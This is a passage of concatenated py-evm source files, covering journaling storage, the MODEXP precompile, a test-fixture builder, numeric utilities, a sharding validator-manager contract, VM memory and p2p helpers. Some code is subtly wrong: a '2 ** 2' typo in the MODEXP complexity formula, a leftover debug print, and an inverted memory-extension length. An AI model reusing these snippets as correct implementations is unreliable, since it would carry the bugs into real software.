checkpoint_id = uuid.uuid4()
self.checkpoints.append(checkpoint_id)
self.journal_data[checkpoint_id] = {}
return checkpoint_id
def pop_checkpoint(self, checkpoint_id):
"""
Returns all changes from the given checkpoint. This includes all of
the changes from any subsequent checkpoints, giving precidence to
earlier checkpoints.
"""
idx = self.checkpoints.index(checkpoint_id)
# update the checkpoint list
checkpoint_ids = self.checkpoints[idx:]
self.checkpoints = self.checkpoints[:idx]
# we pull all of the checkpoints *after* the checkpoint we are
# reverting to and collapse them to a single set of keys that need to
# be reverted (giving precidence to earlier checkpoints).
revert_data = merge(*(
self.journal_data.pop(c_id)
for c_id
in reversed(checkpoint_ids)
))
return dict(revert_data.items())
def commit_checkpoint(self, checkpoint_id):
"""
Collapses all changes for the givent checkpoint into the previous
checkpoint if it exists.
"""
changes_to_merge = self.pop_checkpoint(checkpoint_id)
if self.checkpoints:
# we only have to merge the changes into the latest checkpoint if
# there is one.
self.latest = merge(
changes_to_merge,
self.latest,
)
def __contains__(self, value):
return value in self.journal_data
class JournalDB(BaseDB):
"""
A wrapper around the basic DB objects that keeps a journal of all changes.
Each time a snapshot is taken, the underlying journal creates a new
checkpoint. The journal then keeps track of the original value for any
keys changed. Reverting to a checkpoint involves merging the original key
data from any subsequent checkpoints into the given checkpoint giving
precidence earlier checkpoints. Then the keys from this merged data set
are reset to their original values.
The added memory footprint for a JournalDB is one key/value stored per
database key which is changed. Subsequent changes to the same key within
the same checkpoint will not increase the journal size since we only need
to track the original value for any given key within any given checkpoint.
"""
wrapped_db = None
journal = None
def __init__(self, wrapped_db):
self.wrapped_db = wrapped_db
self.journal = Journal()
def get(self, key):
return self.wrapped_db.get(key)
def set(self, key, value):
"""
- replacing an existing value
- setting a value that does not exist
"""
try:
current_value = self.wrapped_db.get(key)
except KeyError:
current_value = None
if current_value != value:
# only journal `set` operations that change the value.
self.journal.add(key, current_value)
return self.wrapped_db.set(key, value)
def exists(self, key):
return self.wrapped_db.exists(key)
def delete(self, key):
try:
current_value = self.wrapped_db.get(key)
except KeyError:
# no state change so skip journaling
pass
else:
self.journal.add(key, current_value)
return self.wrapped_db.delete(key)
#
# Snapshot API
#
def _validate_checkpoint(self, checkpoint):
"""
Checks to be sure the checkpoint is known by the journal
"""
if checkpoint not in self.journal:
raise ValidationError("Checkpoint not found in journal: {0}".format(
str(checkpoint)
))
def snapshot(self):
"""
Takes a snapshot of the database by creating a checkpoint.
"""
return self.journal.create_checkpoint()
def revert(self, checkpoint):
"""
Reverts the database back to the checkpoint.
"""
self._validate_checkpoint(checkpoint)
for key, value in self.journal.pop_checkpoint(checkpoint).items():
if value is None:
self.wrapped_db.delete(key)
else:
self.wrapped_db.set(key, value)
def commit(self, checkpoint):
"""
Commits a given checkpoint.
"""
self._validate_checkpoint(checkpoint)
self.journal.commit_checkpoint(checkpoint)
def clear(self):
"""
Cleare the entire journal.
"""
self.journal = Journal()
#
# Dictionary API
#
def __getitem__(self, key):
return self.get(key)
def __setitem__(self, key, value):
return self.set(key, value)
def __delitem__(self, key):
return self.delete(key)
def __contains__(self, key):
return self.exists(key)
```
#### File: evm/precompiles/modexp.py
```python
from evm import constants
from evm.utils.numeric import (
big_endian_to_int,
get_highest_bit_index,
int_to_big_endian,
)
from evm.utils.padding import (
pad32r,
zpad_right,
zpad_left,
)
def _compute_adjusted_exponent_length(exponent_length, first_32_exponent_bytes):
exponent = big_endian_to_int(first_32_exponent_bytes)
if exponent_length <= 32 and exponent == 0:
return 0
elif exponent_length <= 32:
return get_highest_bit_index(exponent)
else:
first_32_bytes_as_int = big_endian_to_int(first_32_exponent_bytes)
return (
8 * (exponent_length - 32) +
get_highest_bit_index(first_32_bytes_as_int)
)
def _compute_complexity(length):
if length <= 64:
return length ** 2
elif length <= 1024:
return (
length ** 2 // 4 + 96 * length - 3072
)
else:
return 2 ** 2 // 16 + 480 * length - 199680
def _extract_lengths(data):
# extract argument lengths
base_length_bytes = pad32r(data[:32])
base_length = big_endian_to_int(base_length_bytes)
exponent_length_bytes = pad32r(data[32:64])
exponent_length = big_endian_to_int(exponent_length_bytes)
modulus_length_bytes = pad32r(data[64:96])
modulus_length = big_endian_to_int(modulus_length_bytes)
return base_length, exponent_length, modulus_length
def _compute_modexp_gas_fee(data):
base_length, exponent_length, modulus_length = _extract_lengths(data)
first_32_exponent_bytes = zpad_right(
data[96 + base_length:96 + base_length + exponent_length],
to_size=min(exponent_length, 32),
)[:32]
adjusted_exponent_length = _compute_adjusted_exponent_length(
exponent_length,
first_32_exponent_bytes,
)
complexity = _compute_complexity(max(modulus_length, base_length))
gas_fee = (
complexity *
max(adjusted_exponent_length, 1) //
constants.GAS_MOD_EXP_QUADRATIC_DENOMINATOR
)
return gas_fee
def _modexp(data):
base_length, exponent_length, modulus_length = _extract_lengths(data)
if base_length == 0:
return 0
elif modulus_length == 0:
return 0
# compute start:end indexes
base_end_idx = 96 + base_length
exponent_end_idx = base_end_idx + exponent_length
modulus_end_dx = exponent_end_idx + modulus_length
# extract arguments
modulus_bytes = zpad_right(
data[exponent_end_idx:modulus_end_dx],
to_size=modulus_length,
)
modulus = big_endian_to_int(modulus_bytes)
if modulus == 0:
return 0
base_bytes = zpad_right(data[96:base_end_idx], to_size=base_length)
base = big_endian_to_int(base_bytes)
exponent_bytes = zpad_right(
data[base_end_idx:exponent_end_idx],
to_size=exponent_length,
)
exponent = big_endian_to_int(exponent_bytes)
print('base', base, 'exponent', exponent, 'modulus', modulus)
result = pow(base, exponent, modulus)
return result
def modexp(computation):
"""
https://github.com/ethereum/EIPs/pull/198
"""
gas_fee = _compute_modexp_gas_fee(computation.msg.data)
computation.gas_meter.consume_gas(gas_fee, reason='MODEXP Precompile')
result = _modexp(computation.msg.data)
_, _, modulus_length = _extract_lengths(computation.msg.data)
result_bytes = zpad_left(int_to_big_endian(result), to_size=modulus_length)
computation.output = result_bytes
return computation
```
#### File: tools/test_builder/test_builder.py
```python
from collections import (
defaultdict,
namedtuple,
)
from functools import (
partial,
)
from evm.db.state import (
MainAccountStateDB,
ShardingAccountStateDB,
)
from evm.tools.fixture_tests import (
hash_log_entries,
)
from cytoolz import (
assoc,
assoc_in,
curry,
merge,
)
from eth_utils import (
apply_formatters_to_dict,
decode_hex,
encode_hex,
to_canonical_address,
)
from .normalization import (
normalize_bytes,
normalize_call_creates,
normalize_environment,
normalize_execution,
normalize_int,
normalize_logs,
normalize_state,
normalize_transaction,
normalize_transaction_group,
normalize_networks,
)
from .builder_utils import (
add_transaction_to_group,
calc_state_root,
compile_vyper_lll,
get_test_name,
get_version_from_git,
deep_merge,
wrap_in_list,
)
from .formatters import (
filled_state_test_formatter,
filled_vm_test_formatter,
)
#
# Defaults
#
DEFAULT_MAIN_ENVIRONMENT = {
"currentCoinbase": to_canonical_address("0x2adc25665018aa1fe0e6bc666dac8fc2697ff9ba"),
"currentDifficulty": 131072,
"currentGasLimit": 1000000,
"currentNumber": 1,
"currentTimestamp": 1000,
"previousHash": decode_hex(
"0x5e20a0453cecd065ea59c37ac63e079ee08998b6045136a8ce6635c7912ec0b6"
),
}
DEFAULT_SHARDING_ENVIRONMENT = {
"shardID": 0,
"expectedPeriodNumber": 0,
"periodStartHash": decode_hex(
"0x148067ef259ce711201e6b2a8438b907d0ac0549deef577aff58f1b9143a134a"
),
"currentCoinbase": to_canonical_address("0x2adc25665018aa1fe0e6bc666dac8fc2697ff9ba"),
"currentNumber": 1,
"previousHash": decode_hex(
"0x5e20a0453cecd065ea59c37ac63e079ee08998b6045136a8ce6635c7912ec0b6"
),
}
DEFAULT_MAIN_TRANSACTION = {
"data": b"",
"gasLimit": 100000,
"gasPrice": 0,
"nonce": 0,
"secretKey": decode_hex("0x45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8"),
"to": to_canonical_address("0x0f572e5295c57f15886f9b263e2f6d2d6c7b5ec6"),
"value": 0
}
DEFAULT_SHARDING_TRANSACTION = {
"chainID": 0,
"shardID": 0,
"to": to_canonical_address("0x0f572e5295c57f15886f9b263e2f6d2d6c7b5ec6"),
"data": b"",
"gasLimit": 100000,
"gasPrice": 0,
"accessList": [],
"code": b"",
}
def get_default_transaction(networks):
if "Sharding" not in networks:
return DEFAULT_MAIN_TRANSACTION
else:
return DEFAULT_SHARDING_TRANSACTION
DEFAULT_EXECUTION = {
"address": to_canonical_address("0x0f572e5295c57f15886f9b263e2f6d2d6c7b5ec6"),
"origin": to_canonical_address("0xcd1722f2947def4cf144679da39c4c32bdc35681"),
"caller": to_canonical_address("0xcd1722f2947def4cf144679da39c4c32bdc35681"),
"value": 1000000000000000000,
"data": b"",
"gasPrice": 1,
"gas": 100000
}
ALL_NETWORKS = [
"Frontier",
"Homestead",
"EIP150",
"EIP158",
"Byzantium",
"Sharding",
]
ACCOUNT_STATE_DB_CLASSES = {
"Frontier": MainAccountStateDB,
"Homestead": MainAccountStateDB,
"EIP150": MainAccountStateDB,
"EIP158": MainAccountStateDB,
"Byzantium": MainAccountStateDB,
"Sharding": ShardingAccountStateDB,
}
assert all(network in ACCOUNT_STATE_DB_CLASSES for network in ALL_NETWORKS)
FILLED_WITH_TEMPLATE = "py-evm-{version}"
Test = namedtuple("Test", ["filler", "fill_kwargs"])
Test.__new__.__defaults__ = (None,) # make `None` default for fill_kwargs
#
# Filler Generation
#
def setup_filler(name, environment=None):
environment = normalize_environment(environment or {})
return {name: {
"env": environment,
"pre": {},
}}
def setup_main_filler(name, environment=None):
return setup_filler(name, merge(DEFAULT_MAIN_ENVIRONMENT, environment or {}))
def setup_sharding_filler(name, environment=None):
return setup_filler(name, merge(DEFAULT_SHARDING_ENVIRONMENT, environment or {}))
@curry
def pre_state(pre_state, filler):
test_name = get_test_name(filler)
old_pre_state = filler[test_name].get("pre_state", {})
pre_state = normalize_state(pre_state)
defaults = {address: {
"balance": 0,
"nonce": 0,
"code": b"",
"storage": {},
} for address in pre_state}
new_pre_state = deep_merge(defaults, old_pre_state, pre_state)
return assoc_in(filler, [test_name, "pre"], new_pre_state)
def _expect(post_state, networks, transaction, filler):
test_name = get_test_name(filler)
test = filler[test_name]
test_update = {test_name: {}}
pre_state = test.get("pre", {})
post_state = normalize_state(post_state or {})
defaults = {address: {
"balance": 0,
"nonce": 0,
"code": b"",
"storage": {},
} for address in post_state}
result = deep_merge(defaults, pre_state, normalize_state(post_state))
new_expect = {"result": result}
if transaction is not None:
transaction = normalize_transaction(
merge(get_default_transaction(networks), transaction)
)
if "transaction" not in test:
transaction_group = apply_formatters_to_dict({
"data": wrap_in_list,
"gasLimit": wrap_in_list,
"value": wrap_in_list,
}, transaction)
indexes = {
index_key: 0
for transaction_key, index_key in [
("gasLimit", "gas"),
("value", "value"),
("data", "data"),
]
if transaction_key in transaction_group
}
else:
transaction_group, indexes = add_transaction_to_group(
test["transaction"], transaction
)
new_expect = assoc(new_expect, "indexes", indexes)
test_update = assoc_in(test_update, [test_name, "transaction"], transaction_group)
if networks is not None:
networks = normalize_networks(networks)
new_expect = assoc(new_expect, "networks", networks)
existing_expects = test.get("expect", [])
expect = existing_expects + [new_expect]
test_update = assoc_in(test_update, [test_name, "expect"], expect)
return deep_merge(filler, test_update)
def expect(post_state=None, networks=None, transaction=None):
return partial(_expect, post_state, networks, transaction)
@curry
def execution(execution, filler):
execution = normalize_execution(execution or {})
# user caller as origin if not explicitly given
if "caller" in execution and "origin" not in execution:
execution = assoc(execution, "origin", execution["caller"])
if "vyperLLLCode" in execution:
code = compile_vyper_lll(execution["vyperLLLCode"])
if "code" in execution:
if code != execution["code"]:
raise ValueError("Compiled Vyper LLL code does not match")
execution = assoc(execution, "code", code)
execution = merge(DEFAULT_EXECUTION, execution)
test_name = get_test_name(filler)
return deep_merge(
filler,
{
test_name: {
"exec": execution,
}
}
)
#
# Test Filling
#
def fill_test(filler, info=None, apply_formatter=True, **kwargs):
test_name = get_test_name(filler)
test = filler[test_name]
if "transaction" in test:
filled = fill_state_test(filler, **kwargs)
formatter = filled_state_test_formatter
elif "exec" in test:
filled = fill_vm_test(filler, **kwargs)
formatter = filled_vm_test_formatter
else:
raise ValueError("Given filler does not appear to be for VM or state test")
info = merge(
{"filledwith": FILLED_WITH_TEMPLATE.format(version=get_version_from_git())},
info if info else {}
)
filled = assoc_in(filled, [test_name, "_info"], info)
if apply_formatter:
return formatter(filled)
else:
return filled
def fill_state_test(filler):
test_name = get_test_name(filler)
test = filler[test_name]
environment = normalize_environment(test["env"])
pre_state = normalize_state(test["pre"])
transaction_group = normalize_transaction_group(test["transaction"])
post = defaultdict(list)
for expect in test["expect"]:
indexes = expect["indexes"]
networks = normalize_networks(expect["networks"])
result = normalize_state(expect["result"])
post_state = deep_merge(pre_state, result)
for network in networks:
account_state_db_class = ACCOUNT_STATE_DB_CLASSES[network]
post_state_root = calc_state_root(post_state, account_state_db_class)
post[network].append({
"hash": encode_hex(post_state_root),
"indexes": indexes,
})
return {
test_name: {
"env": environment,
"pre": pre_state,
"transaction": transaction_group,
"post": post
}
}
def fill_vm_test(
filler,
*,
call_creates=None,
gas_price=None,
gas_remaining=0,
logs=None,
output=b""
):
test_name = get_test_name(filler)
test = filler[test_name]
environment = normalize_environment(test["env"])
pre_state = normalize_state(test["pre"])
execution = normalize_execution(test["exec"])
assert len(test["expect"]) == 1
expect = test["expect"][0]
assert "network" not in test
assert "indexes" not in test
result = normalize_state(expect["result"])
post_state = deep_merge(pre_state, result)
call_creates = normalize_call_creates(call_creates or [])
gas_remaining = normalize_int(gas_remaining)
output = normalize_bytes(output)
logs = normalize_logs(logs or [])
log_hash = hash_log_entries(logs)
return {
test_name: {
"env": environment,
"pre": pre_state,
"exec": execution,
"post": post_state,
"callcreates": call_creates,
"gas": gas_remaining,
"output": output,
"logs": log_hash,
}
}
```
#### File: evm/utils/numeric.py
```python
import functools
import itertools
import math
from cytoolz import (
pipe,
)
from evm.constants import (
UINT_255_MAX,
UINT_256_MAX,
UINT_256_CEILING,
)
from evm.utils.padding import (
pad32,
)
def int_to_big_endian(value):
byte_length = math.ceil(value.bit_length() / 8)
return (value).to_bytes(byte_length, byteorder='big')
def big_endian_to_int(value):
return int.from_bytes(value, byteorder='big')
def int_to_byte(value):
return bytes([value])
def int_to_bytes32(value):
if not isinstance(value, int) or isinstance(value, bool):
raise ValueError(
"Value must be an integer: Got: {0}".format(
type(value),
)
)
if value < 0:
raise ValueError(
"Value cannot be negative: Got: {0}".format(
value,
)
)
if value > UINT_256_MAX:
raise ValueError(
"Value exeeds maximum UINT256 size. Got: {0}".format(
value,
)
)
value_bytes = pipe(
value,
int_to_big_endian,
pad32,
)
return value_bytes
byte_to_int = ord
def ceilXX(value, ceiling):
remainder = value % ceiling
if remainder == 0:
return value
else:
return value + ceiling - remainder
ceil32 = functools.partial(ceilXX, ceiling=32)
ceil8 = functools.partial(ceilXX, ceiling=8)
def unsigned_to_signed(value):
if value <= UINT_255_MAX:
return value
else:
return value - UINT_256_CEILING
def signed_to_unsigned(value):
if value < 0:
return value + UINT_256_CEILING
else:
return value
def safe_ord(value):
if isinstance(value, int):
return value
else:
return ord(value)
def is_even(value):
return value % 2 == 0
def is_odd(value):
return value % 2 == 1
def get_highest_bit_index(value):
value >>= 1
for bit_length in itertools.count():
if not value:
return bit_length
value >>= 1
```
#### File: forks/homestead/vm_state.py
```python
from evm.vm.forks.frontier.vm_state import FrontierVMState
from .blocks import HomesteadBlock
from .computation import HomesteadComputation
from .validation import validate_homestead_transaction
class HomesteadVMState(FrontierVMState):
block_class = HomesteadBlock
computation_class = HomesteadComputation
def validate_transaction(self, transaction):
validate_homestead_transaction(self, transaction)
```
#### File: forks/sharding/config.py
```python
from eth_utils import (
to_wei,
)
from evm.utils import (
env,
)
def get_sharding_config():
return {
# TODO: currently is fixed as 100 ETH, should be removed after
# variable-sized deposit is implemented
'DEPOSIT_SIZE': env.get(
'PYEVM_SHARDING_DEPOSIT_SIZE',
type=int,
default=to_wei('100', 'ether'),
),
# the maximum valid ahead periods from the current period for `get_eligible_proposer`
'LOOKAHEAD_PERIODS': env.get('PYEVM_SHARDING_LOOKAHEAD_PERIODS', type=int, default=4),
# the number of blocks in one `period`
'PERIOD_LENGTH': env.get('PYEVM_SHARDING_PERIOD_LENGTH', type=int, default=5),
# the gas limit of one collation
'COLLATION_GASLIMIT': env.get(
'PYEVM_SHARDING_COLLATION_GASLIMIT',
type=int,
default=10 ** 7,
),
# the number of shards
'SHARD_COUNT': env.get('PYEVM_SHARDING_SHARD_COUNT', type=int, default=100),
# the gas limit of verifying a signature
'SIG_GASLIMIT': env.get('PYEVM_SHARDING_SIG_GASLIMIT', type=int, default=40000),
# the reward for creating a collation
'COLLATOR_REWARD': env.get(
'PYEVM_SHARDING_COLLATOR_REWARD',
type=int,
default=to_wei('0.001', 'ether'),
),
# default gas_price
'GAS_PRICE': env.get('PYEVM_SHARDING_GAS_PRICE', type=int, default=1),
# default gas, just a large enough gas for vmc transactions
'DEFAULT_GAS': env.get('PYEVM_SHARDING_DEFAULT_GAS', type=int, default=510000),
}
```
#### File: sharding/contracts/validator_manager.v.py
```python
CollationAdded: __log__({
shard_id: indexed(num),
expected_period_number: num,
period_start_prevhash: bytes32,
parent_hash: bytes32,
transaction_root: bytes32,
collation_coinbase: address,
state_root: bytes32,
receipt_root: bytes32,
collation_number: num,
is_new_head: bool,
score: num,
})
# TODO: determine the signature of the log `Deposit` and `Withdraw`
Deposit: __log__({validator_index: num, validator_addr: address, deposit: wei_value})
Withdraw: __log__({validator_index: num, validator_addr: address, deposit: wei_value})
# Information about validators
validators: public({
# Amount of wei the validator holds
deposit: wei_value,
# Address of the validator
addr: address,
}[num])
# Number of validators
num_validators: public(num)
# Collation headers
collation_headers: public({
parent_hash: bytes32,
score: num,
}[bytes32][num])
# Receipt data
receipts: public({
shard_id: num,
tx_startgas: num,
tx_gasprice: num,
value: wei_value,
sender: address,
to: address,
data: bytes <= 4096,
}[num])
# Current head of each shard
shard_head: public(bytes32[num])
# Number of receipts
num_receipts: num
# Indexs of empty slots caused by the function `withdraw`
empty_slots_stack: num[num]
# The top index of the stack in empty_slots_stack
empty_slots_stack_top: num
# Has the validator deposited before?
is_validator_deposited: public(bool[address])
# Log the latest period number of the shard
period_head: public(num[num])
# Configuration Parameter
# The exact deposit size which you have to deposit to become a validator
deposit_size: wei_value
# Number of blocks in one period
period_length: num
# Number of shards
shard_count: num
# Number of periods ahead of current period, which the contract
# is able to return the collator of that period
lookahead_periods: num
@public
def __init__():
self.num_validators = 0
self.empty_slots_stack_top = 0
# 10 ** 20 wei = 100 ETH
self.deposit_size = 100000000000000000000
self.period_length = 5
self.shard_count = 100
self.lookahead_periods = 4
# Checks if empty_slots_stack_top is empty
@internal
def is_stack_empty() -> bool:
return (self.empty_slots_stack_top == 0)
# Pushes one num to empty_slots_stack
@internal
def stack_push(index: num):
self.empty_slots_stack[self.empty_slots_stack_top] = index
self.empty_slots_stack_top += 1
# Pops one num out of empty_slots_stack
@internal
def stack_pop() -> num:
if self.is_stack_empty():
return -1
self.empty_slots_stack_top -= 1
return self.empty_slots_stack[self.empty_slots_stack_top]
# Returns the current maximum index for validators mapping
@internal
def get_validators_max_index() -> num:
zero_addr = 0x0000000000000000000000000000000000000000
activate_validator_num = 0
all_validator_slots_num = self.num_validators + self.empty_slots_stack_top
# TODO: any better way to iterate the mapping?
for i in range(1024):
if i >= all_validator_slots_num:
break
if self.validators[i].addr != zero_addr:
activate_validator_num += 1
return activate_validator_num + self.empty_slots_stack_top
# Adds a validator to the validator set, with the validator's size being the msg.value
# (ie. amount of ETH deposited) in the function call. Returns the validator index.
@public
@payable
def deposit() -> num:
validator_addr = msg.sender
assert not self.is_validator_deposited[validator_addr]
assert msg.value == self.deposit_size
# find the empty slot index in validators set
if not self.is_stack_empty():
index = self.stack_pop()
else:
index = self.num_validators
self.validators[index] = {
deposit: msg.value,
addr: validator_addr,
}
self.num_validators += 1
self.is_validator_deposited[validator_addr] = True
log.Deposit(index, validator_addr, msg.value)
return index
# Verifies that `msg.sender == validators[validator_index].addr`. if it is removes the validator
# from the validator set and refunds the deposited ETH.
@public
@payable
def withdraw(validator_index: num) -> bool:
validator_addr = self.validators[validator_index].addr
validator_deposit = self.validators[validator_index].deposit
assert msg.sender == validator_addr
self.is_validator_deposited[validator_addr] = False
self.validators[validator_index] = {
deposit: 0,
addr: None,
}
self.stack_push(validator_index)
self.num_validators -= 1
send(validator_addr, validator_deposit)
log.Withdraw(validator_index, validator_addr, validator_deposit)
return True
# Uses a block hash as a seed to pseudorandomly select a signer from the validator set.
# [TODO] Chance of being selected should be proportional to the validator's deposit.
# Should be able to return a value for the current period or any future period up to.
@public
@constant
def get_eligible_proposer(shard_id: num, period: num) -> address:
assert period >= self.lookahead_periods
assert (period - self.lookahead_periods) * self.period_length < block.number
assert self.num_validators > 0
return self.validators[
as_num128(
num256_mod(
as_num256(
sha3(
concat(
# TODO: should check further if this can be further optimized or not
# e.g. be able to get the proposer of one period earlier
blockhash((period - self.lookahead_periods) * self.period_length),
as_bytes32(shard_id),
)
)
),
as_num256(self.get_validators_max_index()),
)
)
].addr
# Attempts to process a collation header, returns True on success, reverts on failure.
@public
def add_header(
shard_id: num,
expected_period_number: num,
period_start_prevhash: bytes32,
parent_hash: bytes32,
transaction_root: bytes32,
collation_coinbase: address, # TODO: cannot be named `coinbase` since it is reserved
state_root: bytes32,
receipt_root: bytes32,
collation_number: num) -> bool: # TODO: cannot be named `number` since it is reserved
zero_addr = 0x0000000000000000000000000000000000000000
# Check if the header is valid
assert (shard_id >= 0) and (shard_id < self.shard_count)
assert block.number >= self.period_length
assert expected_period_number == floor(decimal(block.number / self.period_length))
assert period_start_prevhash == blockhash(expected_period_number * self.period_length - 1)
# Check if this header already exists
header_bytes = concat(
as_bytes32(shard_id),
as_bytes32(expected_period_number),
period_start_prevhash,
parent_hash,
transaction_root,
as_bytes32(collation_coinbase),
state_root,
receipt_root,
as_bytes32(collation_number),
)
entire_header_hash = sha3(header_bytes)
assert self.collation_headers[shard_id][entire_header_hash].score == 0
# Check whether the parent exists.
# if (parent_hash == 0), i.e., is the genesis,
# then there is no need to check.
if parent_hash != as_bytes32(0):
assert self.collation_headers[shard_id][parent_hash].score > 0
# Check if only one collation in one period perd shard
assert self.period_head[shard_id] < expected_period_number
# Check the signature with validation_code_addr
validator_addr = self.get_eligible_proposer(shard_id, block.number / self.period_length)
assert validator_addr != zero_addr
assert msg.sender == validator_addr
# Check score == collation_number
_score = self.collation_headers[shard_id][parent_hash].score + 1
assert collation_number == _score
# Add the header
self.collation_headers[shard_id][entire_header_hash] = {
parent_hash: parent_hash,
score: _score,
}
# Update the latest period number
self.period_head[shard_id] = expected_period_number
# Determine the head
is_new_head = False
if _score > self.collation_headers[shard_id][self.shard_head[shard_id]].score:
self.shard_head[shard_id] = entire_header_hash
is_new_head = True
# Emit log
log.CollationAdded(
shard_id,
expected_period_number,
period_start_prevhash,
parent_hash,
transaction_root,
collation_coinbase,
state_root,
receipt_root,
collation_number,
is_new_head,
_score,
)
return True
# Returns the gas limit that collations can currently have (by default make
# this function always answer 10 million).
@public
@constant
def get_collation_gas_limit() -> num:
return 10000000
# Records a request to deposit msg.value ETH to address to in shard shard_id
# during a future collation. Saves a `receipt ID` for this request,
# also saving `msg.sender`, `msg.value`, `to`, `shard_id`, `startgas`,
# `gasprice`, and `data`.
@public
@payable
def tx_to_shard(
to: address,
shard_id: num,
tx_startgas: num,
tx_gasprice: num,
data: bytes <= 4096) -> num:
self.receipts[self.num_receipts] = {
shard_id: shard_id,
tx_startgas: tx_startgas,
tx_gasprice: tx_gasprice,
value: msg.value,
sender: msg.sender,
to: to,
data: data,
}
receipt_id = self.num_receipts
self.num_receipts += 1
# TODO: determine the signature of the log TxToShard
raw_log(
[
sha3("tx_to_shard(address,num,num,num,bytes4096)"),
as_bytes32(to),
as_bytes32(shard_id),
],
concat('', as_bytes32(receipt_id)),
)
return receipt_id
# Updates the tx_gasprice in receipt receipt_id, and returns True on success.
@public
@payable
def update_gasprice(receipt_id: num, tx_gasprice: num) -> bool:
assert self.receipts[receipt_id].sender == msg.sender
self.receipts[receipt_id].tx_gasprice = tx_gasprice
return True
```
#### File: evm/vm/memory.py
```python
import itertools
import logging
from evm.validation import (
validate_is_bytes,
validate_length,
validate_lte,
validate_uint256,
)
from evm.utils.numeric import (
ceil32,
)
class Memory(object):
"""
VM Memory
"""
bytes = None
logger = logging.getLogger('evm.vm.memory.Memory')
def __init__(self):
self.bytes = bytearray()
def extend(self, start_position, size):
if size == 0:
return
new_size = ceil32(start_position + size)
if new_size <= len(self):
return
size_to_extend = new_size - len(self)
self.bytes.extend(itertools.repeat(0, size_to_extend))
def __len__(self):
return len(self.bytes)
def write(self, start_position, size, value):
"""
Write `value` into memory.
"""
if size:
validate_uint256(start_position)
validate_uint256(size)
validate_is_bytes(value)
validate_length(value, length=size)
validate_lte(start_position + size, maximum=len(self))
if len(self.bytes) < start_position + size:
self.bytes.extend(itertools.repeat(
0,
len(self.bytes) - (start_position + size),
))
for idx, v in enumerate(value):
self.bytes[start_position + idx] = v
def read(self, start_position, size):
"""
Read a value from memory.
"""
return bytes(self.bytes[start_position:start_position + size])
```
#### File: py-evm/p2p/sedes.py
```python
from rlp import sedes
class HashOrNumber:
def serialize(self, obj):
if isinstance(obj, int):
return sedes.big_endian_int.serialize(obj)
return sedes.binary.serialize(obj)
def deserialize(self, serial):
if len(serial) == 32:
return sedes.binary.deserialize(serial)
return sedes.big_endian_int.deserialize(serial)
```
#### File: py-evm/p2p/utils.py
```python
import os
import rlp
from evm.utils.numeric import big_endian_to_int
def sxor(s1: bytes, s2: bytes) -> bytes:
if len(s1) != len(s2):
raise ValueError("Cannot sxor strings of different length")
return bytes(x ^ y for x, y in zip(s1, s2))
def roundup_16(x):
"""Rounds up the given value to the next multiple of 16."""
remainder = x % 16
if remainder != 0:
x += 16 - remainder
return x
def gen_request_id():
return big_endian_to_int(os.urandom(8))
def get_devp2p_cmd_id(msg: bytes) -> int:
"""Return the cmd_id for the given devp2p msg.
The cmd_id, also known as the payload type, is always the first entry of the RLP, interpreted
as an integer.
"""
return rlp.decode(msg[:1], sedes=rlp.sedes.big_endian_int)
def safe_ord(value):
if isinstance(value, int):
return value
else:
return ord(value)
```
#### File: auxiliary/user-account/test_contract.py
```python
import pytest
from eth_keys import keys
from trie import (
BinaryTrie,
)
from cytoolz import (
merge,
dissoc,
assoc,
)
from evm.constants import (
UINT_256_MAX,
SECPK1_N,
ZERO_HASH32,
ENTRY_POINT,
EMPTY_SHA3,
)
from evm.vm.message import (
ShardingMessage,
)
from evm.vm.forks.sharding import (
ShardingVM,
)
from evm.vm.forks.sharding.transaction_context import (
ShardingTransactionContext,
)
from evm.vm.forks.sharding.transactions import (
ShardingTransaction,
)
from evm.rlp.headers import (
CollationHeader,
)
from evm.db import (
get_db_backend,
)
from evm.db.chain import (
ChainDB,
)
from evm.db.state import (
ShardingAccountStateDB,
)
from eth_utils import (
keccak,
to_canonical_address,
int_to_big_endian,
big_endian_to_int,
decode_hex,
)
from evm.utils.padding import (
pad32,
zpad_left,
)
from evm.utils.address import (
generate_CREATE2_contract_address,
)
from evm.auxiliary.user_account_contract.transaction import (
UserAccountTransaction,
UnsignedUserAccountTransaction,
)
from evm.auxiliary.user_account_contract.contract import (
generate_account_bytecode,
NONCE_GETTER_ID,
ECRECOVER_ADDRESS as ECRECOVER_ADDRESS_INT,
)
PRIVATE_KEY = keys.PrivateKey(b"\x33" * 32)
ACCOUNT_CODE = generate_account_bytecode(PRIVATE_KEY.public_key.to_canonical_address())
ACCOUNT_ADDRESS = generate_CREATE2_contract_address(b"", ACCOUNT_CODE)
INITIAL_BALANCE = 10000000000
# contract that does nothing
NOOP_CONTRACT_CODE = b""
NOOP_CONTRACT_ADDRESS = generate_CREATE2_contract_address(b"", NOOP_CONTRACT_CODE)
# contract that reverts without returning data
FAILING_CONTRACT_CODE = b"\x61\x00\x00\xfd" # PUSH2 0 0 REVERT
FAILING_CONTRACT_ADDRESS = generate_CREATE2_contract_address(b"", FAILING_CONTRACT_CODE)
# contract that logs available gas
# GAS PUSH1 0 MSTORE PUSH1 32 PUSH1 0 LOG0
GAS_LOGGING_CONTRACT_CODE = b"\x5a\x60\x00\x52\x60\x20\x60\x00\xa0"
GAS_LOGGING_CONTRACT_ADDRESS = generate_CREATE2_contract_address(b"", GAS_LOGGING_CONTRACT_CODE)
# contract that logs hash of passed data
# CALLDATASIZE PUSH1 0 PUSH1 0 CALLDATACOPY CALLDATASIZE PUSH1 0 SHA3 PUSH1 0 MSTORE PUSH1 32
# PUSH1 0 LOG0
DATA_LOGGING_CONTRACT_CODE = (
b"\x36\x60\x00\x60\x00\x37\x36\x60\x00\x20\x60\x00\x52\x60\x20\x60\x00\xa0"
)
DATA_LOGGING_CONTRACT_ADDRESS = generate_CREATE2_contract_address(b"", DATA_LOGGING_CONTRACT_CODE)
HELPER_CONTRACTS = {
ACCOUNT_ADDRESS: ACCOUNT_CODE,
NOOP_CONTRACT_ADDRESS: NOOP_CONTRACT_CODE,
FAILING_CONTRACT_ADDRESS: FAILING_CONTRACT_CODE,
GAS_LOGGING_CONTRACT_ADDRESS: GAS_LOGGING_CONTRACT_CODE,
DATA_LOGGING_CONTRACT_ADDRESS: DATA_LOGGING_CONTRACT_CODE,
}
DESTINATION_ADDRESS = b"\xbb" * 20
ECRECOVER_ADDRESS = zpad_left(int_to_big_endian(ECRECOVER_ADDRESS_INT), 20)
DEFAULT_BASE_TX_PARAMS = {
"chain_id": 1,
"shard_id": 1,
"to": ACCOUNT_ADDRESS,
"gas": 500000,
"access_list": [
